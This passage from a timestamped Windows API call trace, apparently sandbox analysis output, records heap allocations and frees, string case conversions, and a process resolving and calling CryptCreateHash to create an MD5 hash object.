(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0241.980] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0241.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0241.980] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0241.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0241.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0241.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0241.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0241.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0241.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0241.981] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0241.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0241.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0241.981] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0241.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0241.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0241.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0241.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0241.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0241.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0241.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0241.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0241.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0241.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0241.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0241.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0241.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0241.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0241.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0241.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0241.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0241.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0241.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0241.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0241.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0241.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0241.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0241.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0241.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0241.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0241.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0241.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0241.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0241.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0241.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0241.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0241.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0241.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0241.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0241.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0241.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0241.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0241.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0241.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0241.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0241.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0241.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0241.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0241.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51340, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0241.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0241.986] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0241.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0241.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0241.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0241.987] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0241.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0241.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0241.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0241.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0241.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0241.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0241.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0241.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.990] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0241.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0241.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: 